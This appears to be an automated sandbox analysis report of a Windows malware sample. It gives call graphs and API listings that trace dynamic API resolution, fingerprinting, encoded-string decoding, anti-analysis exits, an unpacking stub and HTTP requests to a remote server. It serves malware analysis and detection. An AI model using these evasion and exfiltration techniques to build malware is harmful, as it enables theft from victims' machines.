415be1 45657->45659 45657->45683 45661 415a55 45658->45661 45660 41abb0 lstrcpy 45659->45660 45662 415bed 45660->45662 45663 4016b0 lstrcpy 45661->45663 45664 41ab30 2 API calls 45662->45664 45684 415a61 45663->45684 45666 415bfb 45664->45666 45665 415510 29 API calls 45665->45683 45668 41ab30 2 API calls 45666->45668 45667 415c5b StrCmpCA 45669 415c66 Sleep 45667->45669 45670 415c78 45667->45670 45671 415c0a 45668->45671 45669->45683 45672 41abb0 lstrcpy 45670->45672 45674 4016b0 lstrcpy 45671->45674 45673 415c84 45672->45673 45675 41ab30 2 API calls 45673->45675 45674->45684 45676 415c93 45675->45676 45677 41ab30 2 API calls 45676->45677 45678 415ca2 45677->45678 45680 4016b0 lstrcpy 45678->45680 45679 4159da StrCmpCA 45679->45683 45680->45684 45681 401590 lstrcpy 45681->45683 45682 415b8f StrCmpCA 45682->45683 45683->45645 45683->45646 45683->45647 45683->45648 45683->45650 45683->45654 45683->45655 45683->45657 45683->45665 45683->45667 45683->45679 45683->45681 45683->45682 45684->44738 45686 4176e3 GetVolumeInformationA 45685->45686 45687 4176dc 45685->45687 45689 417721 45686->45689 45687->45686 45688 41778c GetProcessHeap HeapAlloc 45690 4177a9 45688->45690 45691 4177b8 wsprintfA 45688->45691 45689->45688 45693 41aa50 lstrcpy 45690->45693 45692 41aa50 lstrcpy 45691->45692 45694 415ff7 45692->45694 45693->45694 45694->44759 45696 41aab0 lstrcpy 45695->45696 45697 4048e9 45696->45697 45902 404800 45697->45902 45699 4048f5 45700 41aa50 lstrcpy 45699->45700 45701 404927 45700->45701 45702 41aa50 lstrcpy 45701->45702 45703 404934 45702->45703 45704 41aa50 lstrcpy 45703->45704 45705 404941 45704->45705 45706 41aa50 lstrcpy 45705->45706 45707 40494e 45706->45707 45708 41aa50 lstrcpy 45707->45708 45709 40495b InternetOpenA StrCmpCA 45708->45709 45710 404994 45709->45710 45711 404f1b InternetCloseHandle 45710->45711 45910 418cf0 45710->45910 45712 404f38 45711->45712 45925 40a210 CryptStringToBinaryA 45712->45925 45714 4049b3 45918 41ac30 45714->45918 45717 4049c6 45719 41abb0 lstrcpy 45717->45719 45724 4049cf 45719->45724 45720 41ab30 2 API calls 45721 404f55 45720->45721 45723 41acc0 4 API calls 45721->45723 45722 404f77 ctype 45726 41aab0 lstrcpy 45722->45726 45725 404f6b 45723->45725 45728 41acc0 4 API calls 45724->45728 45727 41abb0 lstrcpy 45725->45727 45739 404fa7 45726->45739 45727->45722 45729 4049f9 45728->45729 45730 41abb0 lstrcpy 45729->45730 45731 404a02 45730->45731 45732 41acc0 4 API calls 45731->45732 45733 404a21 45732->45733 45734 41abb0 lstrcpy 45733->45734 45735 404a2a 45734->45735 45736 41ac30 3 API calls 45735->45736 45737 404a48 45736->45737 45738 41abb0 lstrcpy 45737->45738 45740 404a51 45738->45740 45739->44762 45741 41acc0 4 API calls 45740->45741 45742 404a70 45741->45742 45743 41abb0 lstrcpy 45742->45743 45744 404a79 45743->45744 45745 41acc0 4 API calls 45744->45745 45746 404a98 45745->45746 45747 41abb0 lstrcpy 45746->45747 45748 404aa1 45747->45748 45749 41acc0 4 API calls 45748->45749 45750 404acd 45749->45750 45751 41ac30 3 API calls 45750->45751 45752 404ad4 45751->45752 45753 41abb0 lstrcpy 45752->45753 45754 404add 45753->45754 45755 404af3 InternetConnectA 45754->45755 45755->45711 45756 404b23 HttpOpenRequestA 45755->45756 45758 404b78 45756->45758 45759 404f0e InternetCloseHandle 45756->45759 45760 41acc0 4 API calls 45758->45760 45759->45711 45761 404b8c 45760->45761 45762 41abb0 lstrcpy 45761->45762 45763 404b95 45762->45763 45764 41ac30 3 API calls 45763->45764 45765 404bb3 45764->45765 45766 41abb0 lstrcpy 45765->45766 45767 404bbc 45766->45767 45768 41acc0 4 API calls 45767->45768 45769 404bdb 45768->45769 45770 41abb0 lstrcpy 45769->45770 45771 404be4 45770->45771 45772 41acc0 4 API calls 45771->45772 45773 404c05 45772->45773 45774 41abb0 lstrcpy 45773->45774 45775 404c0e 45774->45775 45776 41acc0 4 API calls 45775->45776 45777 404c2e 45776->45777 45778 41abb0 lstrcpy 45777->45778 45779 404c37 45778->45779 45780 41acc0 4 API calls 45779->45780 45781 404c56 45780->45781 45782 41abb0 lstrcpy 45781->45782 45783 404c5f 45782->45783 45784 41ac30 3 API calls 45783->45784 45785 404c7d 45784->45785 45786 41abb0 lstrcpy 45785->45786 45787 404c86 45786->45787 45788 41acc0 4 API calls 45787->45788 45789 404ca5 45788->45789 45790 41abb0 lstrcpy 45789->45790 45791 404cae 45790->45791 45792 41acc0 4 API calls 45791->45792 45793 404ccd 45792->45793 45794 41abb0 lstrcpy 45793->45794 45795 404cd6 45794->45795 45796 41ac30 3 API calls 45795->45796 45797 404cf4 45796->45797 45798 41abb0 lstrcpy 45797->45798 45799 404cfd 45798->45799 45800 41acc0 4 API calls 45799->45800 45801 404d1c 45800->45801 45802 41abb0 lstrcpy 45801->45802 45803 404d25 45802->45803 45804 41acc0 4 API calls 45803->45804 45805 404d46 45804->45805 45806 41abb0 lstrcpy 45805->45806 45807 404d4f 45806->45807 45808 41acc0 4 API calls 45807->45808 45809 404d6f 45808->45809 45810 41abb0 lstrcpy 45809->45810 45811 404d78 45810->45811 45812 41acc0 4 API calls 45811->45812 45813 404d97 45812->45813 45814 41abb0 lstrcpy 45813->45814 45815 404da0 45814->45815 45816 41ac30 3 API calls 45815->45816 45817 404dbe 45816->45817 45818 41abb0 lstrcpy 45817->45818 45819 404dc7 45818->45819 45820 41aa50 lstrcpy 45819->45820 45821 404de2 45820->45821 45822 41ac30 3 API calls 45821->45822 45823 404e03 45822->45823 45824 41ac30 3 API calls 45823->45824 45825 404e0a 45824->45825 45826 41abb0 lstrcpy 45825->45826 45827 404e16 45826->45827 45828 404e37 lstrlenA 45827->45828 45829 404e4a 45828->45829 45830 404e53 lstrlenA 45829->45830 45924 41ade0 45830->45924 45832 404e63 HttpSendRequestA 45833 404e82 InternetReadFile 45832->45833 45834 404eb7 InternetCloseHandle 45833->45834 45839 404eae 45833->45839 45837 41ab10 45834->45837 45836 41acc0 4 API calls 45836->45839 45837->45759 45838 41abb0 lstrcpy 45838->45839 45839->45833 45839->45834 45839->45836 45839->45838 45934 41ade0 45840->45934 45842 411a14 StrCmpCA 45843 411a27 45842->45843 45844 411a1f ExitProcess 45842->45844 45845 411a37 strtok_s 45843->45845 45857 411a44 45845->45857 45846 411bee strtok_s 45846->45857 45847 411b41 StrCmpCA 45847->45857 45848 411ba1 StrCmpCA 45848->45857 45849 411bc0 StrCmpCA 45849->45857 45850 411b63 StrCmpCA 45850->45857 45851 411b82 StrCmpCA 45851->45857 45852 411aad StrCmpCA 45852->45857 45853 411acf StrCmpCA 45853->45857 45854 411afd StrCmpCA 45854->45857 45855 411b1f StrCmpCA 45855->45857 45856 411c12 45856->44764 45857->45846 45857->45847 45857->45848 45857->45849 45857->45850 45857->45851 45857->45852 45857->45853 45857->45854 45857->45855 45857->45856 45858 41ab30 lstrlenA lstrcpy 45857->45858 45859 41ab30 2 API calls 45857->45859 45858->45857 45859->45846 45860->44770 45861->44772 45862->44778 45863->44780 45864->44786 45865->44788 45866->44792 45867->44796 45868->44800 45869->44806 45870->44808 45871->44812 45872->44826 45873->44830 45874->44829 45875->44825 45876->44829 45877->44847 45878->44832 45879->44834 45880->44838 45881->44843 45882->44844 45883->44850 45884->44858 45885->44860 45886->44882 45887->44887 45888->44886 45889->44883 45890->44886 45891->44896 45894 41aab0 lstrcpy 45893->45894 45895 4016c3 45894->45895 45896 41aab0 lstrcpy 45895->45896 45897 4016d5 45896->45897 45898 41aab0 lstrcpy 45897->45898 45899 4016e7 45898->45899 45900 41aab0 lstrcpy 45899->45900 45901 4015a3 45900->45901 45901->45622 45930 401030 45902->45930 45906 404888 lstrlenA 45933 41ade0 45906->45933 45908 404898 InternetCrackUrlA 45909 4048b7 45908->45909 45909->45699 45911 41aa50 lstrcpy 45910->45911 45912 418d04 45911->45912 45913 41aa50 lstrcpy 45912->45913 45914 418d12 GetSystemTime 45913->45914 45915 418d29 45914->45915 45916 41aab0 lstrcpy 45915->45916 45917 418d8c 45916->45917 45917->45714 45919 41ac41 45918->45919 45920 41ac98 45919->45920 45922 41ac78 lstrcpy lstrcatA 45919->45922 45921 41aab0 lstrcpy 45920->45921 45923 41aca4 45921->45923 45922->45920 45923->45717 45924->45832 45926 40a249 LocalAlloc 45925->45926 45927 404f3e 45925->45927 45926->45927 45928 40a264 CryptStringToBinaryA 45926->45928 45927->45720 45927->45722 45928->45927 45929 40a289 LocalFree 45928->45929 45929->45927 45931 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 45930->45931 45932 41ade0 45931->45932 45932->45906 45933->45908 45934->45842 45935 840000 45938 840006 45935->45938 45939 840015 45938->45939 45942 8407a6 45939->45942 45943 8407c1 45942->45943 45944 8407ca CreateToolhelp32Snapshot 45943->45944 45945 8407e6 Module32First 45943->45945 45944->45943 45944->45945 45946 8407f5 45945->45946 45947 840005 45945->45947 45949 840465 45946->45949 45950 840490 45949->45950 45951 8404a1 VirtualAlloc 45950->45951 45952 8404d9 45950->45952 45951->45952 45952->45952 45953 245003c 45954 2450049 45953->45954 45968 2450e0f SetErrorMode SetErrorMode 45954->45968 45959 2450265 45960 24502ce VirtualProtect 45959->45960 45962 245030b 45960->45962 45961 2450439 VirtualFree 45966 24504be 45961->45966 45967 24505f4 LoadLibraryA 45961->45967 45962->45961 45963 24504e3 LoadLibraryA 45963->45966 45965 24508c7 45966->45963 45966->45967 45967->45965 45969 2450223 45968->45969 45970 2450d90 45969->45970 45971 2450dad 45970->45971 45972 2450238 VirtualAlloc 45971->45972 45973 2450dbb GetPEB 45971->45973 45972->45959 45973->45972

                                            Executed Functions

                                            Function 00419F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 633 419f20-419f2a 634 419f30-41a341 GetProcAddress * 43 633->634 635 41a346-41a3da LoadLibraryA * 8 633->635 634->635 636 41a456-41a45d 635->636 637 41a3dc-41a451 GetProcAddress * 5 635->637 638 41a463-41a521 GetProcAddress * 8 636->638 639 41a526-41a52d 636->639 637->636 638->639 640 41a5a8-41a5af 639->640 641 41a52f-41a5a3 GetProcAddress * 5 639->641 642 41a5b5-41a642 GetProcAddress * 6 640->642 643 41a647-41a64e 640->643 641->640 642->643 644 41a654-41a72a GetProcAddress * 9 643->644 645 41a72f-41a736 643->645 644->645 646 41a7b2-41a7b9 645->646 647 41a738-41a7ad GetProcAddress * 5 645->647 648 41a7bb-41a7e7 GetProcAddress * 2 646->648 649 41a7ec-41a7f3 646->649 647->646 648->649 650 41a825-41a82c 649->650 651 41a7f5-41a820 GetProcAddress * 2 649->651 652 41a922-41a929 650->652 653 41a832-41a91d GetProcAddress * 10 650->653 651->650 654 41a92b-41a988 GetProcAddress * 4 652->654 655 41a98d-41a994 652->655 653->652 654->655 656 41a996-41a9a9 GetProcAddress 655->656 657 41a9ae-41a9b5 655->657 656->657 658 41a9b7-41aa13 GetProcAddress * 4 657->658 659 41aa18-41aa19 657->659 658->659
                                            APIs
                                            • GetProcAddress.KERNEL32(74DD0000,009C63B8), ref: 00419F3D
                                            • GetProcAddress.KERNEL32(74DD0000,009C6478), ref: 00419F55
                                            • GetProcAddress.KERNEL32(74DD0000,009C99F0), ref: 00419F6E
                                            • GetProcAddress.KERNEL32(74DD0000,009C9A08), ref: 00419F86
                                            • GetProcAddress.KERNEL32(74DD0000,009C9AE0), ref: 00419F9E
                                            • GetProcAddress.KERNEL32(74DD0000,009C9B70), ref: 00419FB7
                                            • GetProcAddress.KERNEL32(74DD0000,009CC200), ref: 00419FCF
                                            • GetProcAddress.KERNEL32(74DD0000,009C9AF8), ref: 00419FE7
                                            • GetProcAddress.KERNEL32(74DD0000,009C9AC8), ref: 0041A000
                                            • GetProcAddress.KERNEL32(74DD0000,009C9B10), ref: 0041A018
                                            • GetProcAddress.KERNEL32(74DD0000,009C9B88), ref: 0041A030
                                            • GetProcAddress.KERNEL32(74DD0000,009C6158), ref: 0041A049
                                            • GetProcAddress.KERNEL32(74DD0000,009C6298), ref: 0041A061
                                            • GetProcAddress.KERNEL32(74DD0000,009C62F8), ref: 0041A079
                                            • GetProcAddress.KERNEL32(74DD0000,009C60F8), ref: 0041A092
                                            • GetProcAddress.KERNEL32(74DD0000,009C9B28), ref: 0041A0AA
                                            • GetProcAddress.KERNEL32(74DD0000,009C9B40), ref: 0041A0C2
                                            • GetProcAddress.KERNEL32(74DD0000,009CC160), ref: 0041A0DB
                                            • GetProcAddress.KERNEL32(74DD0000,009C62D8), ref: 0041A0F3
                                            • GetProcAddress.KERNEL32(74DD0000,009C9B58), ref: 0041A10B
                                            • GetProcAddress.KERNEL32(74DD0000,009CFE20), ref: 0041A124
                                            • GetProcAddress.KERNEL32(74DD0000,009CFDD8), ref: 0041A13C
                                            • GetProcAddress.KERNEL32(74DD0000,009CFDF0), ref: 0041A154
                                            • GetProcAddress.KERNEL32(74DD0000,009C60D8), ref: 0041A16D
                                            • GetProcAddress.KERNEL32(74DD0000,009CFD48), ref: 0041A185
                                            • GetProcAddress.KERNEL32(74DD0000,009CFE80), ref: 0041A19D
                                            • GetProcAddress.KERNEL32(74DD0000,009CFD18), ref: 0041A1B6
                                            • GetProcAddress.KERNEL32(74DD0000,009CFD60), ref: 0041A1CE
                                            • GetProcAddress.KERNEL32(74DD0000,009CFBF8), ref: 0041A1E6
                                            • GetProcAddress.KERNEL32(74DD0000,009CFC58), ref: 0041A1FF
                                            • GetProcAddress.KERNEL32(74DD0000,009CFCB8), ref: 0041A217
                                            • GetProcAddress.KERNEL32(74DD0000,009CFE38), ref: 0041A22F
                                            • GetProcAddress.KERNEL32(74DD0000,009CFE98), ref: 0041A248
                                            • GetProcAddress.KERNEL32(74DD0000,009CBBE8), ref: 0041A260
                                            • GetProcAddress.KERNEL32(74DD0000,009CFC88), ref: 0041A278
                                            • GetProcAddress.KERNEL32(74DD0000,009CFEB0), ref: 0041A291
                                            • GetProcAddress.KERNEL32(74DD0000,009C6318), ref: 0041A2A9
                                            • GetProcAddress.KERNEL32(74DD0000,009CFEC8), ref: 0041A2C1
                                            • GetProcAddress.KERNEL32(74DD0000,009C6338), ref: 0041A2DA
                                            • GetProcAddress.KERNEL32(74DD0000,009CFD90), ref: 0041A2F2
                                            • GetProcAddress.KERNEL32(74DD0000,009CFCE8), ref: 0041A30A
                                            • GetProcAddress.KERNEL32(74DD0000,009C5ED8), ref: 0041A323
                                            • GetProcAddress.KERNEL32(74DD0000,009C6018), ref: 0041A33B
                                            • LoadLibraryA.KERNEL32(009CFDA8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A34D
                                            • LoadLibraryA.KERNEL32(009CFD78,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A35E
                                            • LoadLibraryA.KERNEL32(009CFDC0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A370
                                            • LoadLibraryA.KERNEL32(009CFEE0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A382
                                            • LoadLibraryA.KERNEL32(009CFE08,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A393
                                            • LoadLibraryA.KERNEL32(009CFE50,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3A5
                                            • LoadLibraryA.KERNEL32(009CFC28,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3B7
                                            • LoadLibraryA.KERNEL32(009CFCD0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3C8
                                            • GetProcAddress.KERNEL32(75290000,009C5F78), ref: 0041A3EA
                                            • GetProcAddress.KERNEL32(75290000,009CFE68), ref: 0041A402
                                            • GetProcAddress.KERNEL32(75290000,009C94F0), ref: 0041A41A
                                            • GetProcAddress.KERNEL32(75290000,009CFC10), ref: 0041A433
                                            • GetProcAddress.KERNEL32(75290000,009C5E58), ref: 0041A44B
                                            • GetProcAddress.KERNEL32(73B40000,009CBEE0), ref: 0041A470
                                            • GetProcAddress.KERNEL32(73B40000,009C5E78), ref: 0041A489
                                            • GetProcAddress.KERNEL32(73B40000,009CBE40), ref: 0041A4A1
                                            • GetProcAddress.KERNEL32(73B40000,009CFD00), ref: 0041A4B9
                                            • GetProcAddress.KERNEL32(73B40000,009CFC40), ref: 0041A4D2
                                            • GetProcAddress.KERNEL32(73B40000,009C5FF8), ref: 0041A4EA
                                            • GetProcAddress.KERNEL32(73B40000,009C5DD8), ref: 0041A502
                                            • GetProcAddress.KERNEL32(73B40000,009CFC70), ref: 0041A51B
                                            • GetProcAddress.KERNEL32(752C0000,009C5EF8), ref: 0041A53C
                                            • GetProcAddress.KERNEL32(752C0000,009C5FB8), ref: 0041A554
                                            • GetProcAddress.KERNEL32(752C0000,009CFCA0), ref: 0041A56D
                                            • GetProcAddress.KERNEL32(752C0000,009CFD30), ref: 0041A585
                                            • GetProcAddress.KERNEL32(752C0000,009C5EB8), ref: 0041A59D
                                            • GetProcAddress.KERNEL32(74EC0000,009CBF80), ref: 0041A5C3
                                            • GetProcAddress.KERNEL32(74EC0000,009CBE68), ref: 0041A5DB
                                            • GetProcAddress.KERNEL32(74EC0000,009CFF40), ref: 0041A5F3
                                            • GetProcAddress.KERNEL32(74EC0000,009C5F18), ref: 0041A60C
                                            • GetProcAddress.KERNEL32(74EC0000,009C5DF8), ref: 0041A624
                                            • GetProcAddress.KERNEL32(74EC0000,009CBFA8), ref: 0041A63C
                                            • GetProcAddress.KERNEL32(75BD0000,009CFF28), ref: 0041A662
                                            • GetProcAddress.KERNEL32(75BD0000,009C5E18), ref: 0041A67A
                                            • GetProcAddress.KERNEL32(75BD0000,009C9400), ref: 0041A692
                                            • GetProcAddress.KERNEL32(75BD0000,009CFF58), ref: 0041A6AB
                                            • GetProcAddress.KERNEL32(75BD0000,009CFF70), ref: 0041A6C3
                                            • GetProcAddress.KERNEL32(75BD0000,009C5CF8), ref: 0041A6DB
                                            • GetProcAddress.KERNEL32(75BD0000,009C6098), ref: 0041A6F4
                                            • GetProcAddress.KERNEL32(75BD0000,009CFF88), ref: 0041A70C
                                            • GetProcAddress.KERNEL32(75BD0000,009CFEF8), ref: 0041A724
                                            • GetProcAddress.KERNEL32(75A70000,009C5D78), ref: 0041A746
                                            • GetProcAddress.KERNEL32(75A70000,009CFFB8), ref: 0041A75E
                                            • GetProcAddress.KERNEL32(75A70000,009CFFA0), ref: 0041A776
                                            • GetProcAddress.KERNEL32(75A70000,009CFF10), ref: 0041A78F
                                            • GetProcAddress.KERNEL32(75A70000,009D0228), ref: 0041A7A7
                                            • GetProcAddress.KERNEL32(75450000,009C5D18), ref: 0041A7C8
                                            • GetProcAddress.KERNEL32(75450000,009C5E38), ref: 0041A7E1
                                            • GetProcAddress.KERNEL32(75DA0000,009C5F38), ref: 0041A802
                                            • GetProcAddress.KERNEL32(75DA0000,009D0090), ref: 0041A81A
                                            • GetProcAddress.KERNEL32(6F070000,009C6078), ref: 0041A840
                                            • GetProcAddress.KERNEL32(6F070000,009C5FD8), ref: 0041A858
                                            • GetProcAddress.KERNEL32(6F070000,009C5F98), ref: 0041A870
                                            • GetProcAddress.KERNEL32(6F070000,009D0198), ref: 0041A889
                                            • GetProcAddress.KERNEL32(6F070000,009C5E98), ref: 0041A8A1
                                            • GetProcAddress.KERNEL32(6F070000,009C5F58), ref: 0041A8B9
                                            • GetProcAddress.KERNEL32(6F070000,009C6038), ref: 0041A8D2
                                            • GetProcAddress.KERNEL32(6F070000,009C6058), ref: 0041A8EA
                                            • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A901
                                            • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A917
                                            • GetProcAddress.KERNEL32(75AF0000,009D0270), ref: 0041A939
                                            • GetProcAddress.KERNEL32(75AF0000,009C95A0), ref: 0041A951
                                            • GetProcAddress.KERNEL32(75AF0000,009D0060), ref: 0041A969
                                            • GetProcAddress.KERNEL32(75AF0000,009D01C8), ref: 0041A982
                                            • GetProcAddress.KERNEL32(75D90000,009C60B8), ref: 0041A9A3
                                            • GetProcAddress.KERNEL32(6F9D0000,009D02A0), ref: 0041A9C4
                                            • GetProcAddress.KERNEL32(6F9D0000,009C5CD8), ref: 0041A9DD
                                            • GetProcAddress.KERNEL32(6F9D0000,009D0108), ref: 0041A9F5
                                            • GetProcAddress.KERNEL32(6F9D0000,009D0168), ref: 0041AA0D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID: HttpQueryInfoA$InternetSetOptionA
                                            • API String ID: 2238633743-1775429166
                                            • Opcode ID: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                            • Instruction ID: fc853244e6edf76f870e234c3061c456cb9d9aaab695e8dd72f65461d71d1d70
                                            • Opcode Fuzzy Hash: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                            • Instruction Fuzzy Hash: 98623EB5D1B2549FC344DFA8FC8895677BBA78D301318A61BF909C3674E734A640CB62
                                            Function 00404610 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114stringmemoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040461C
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404627
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404632
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040463D
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404648
                                            • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,00416C9B), ref: 00404657
                                            • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,00416C9B), ref: 0040465E
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040466C
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404677
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404682
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040468D
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404698
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046AC
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046B7
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046C2
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046CD
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046D8
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
                                            • strlen.MSVCRT ref: 00404740
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
                                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC
                                            Strings
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
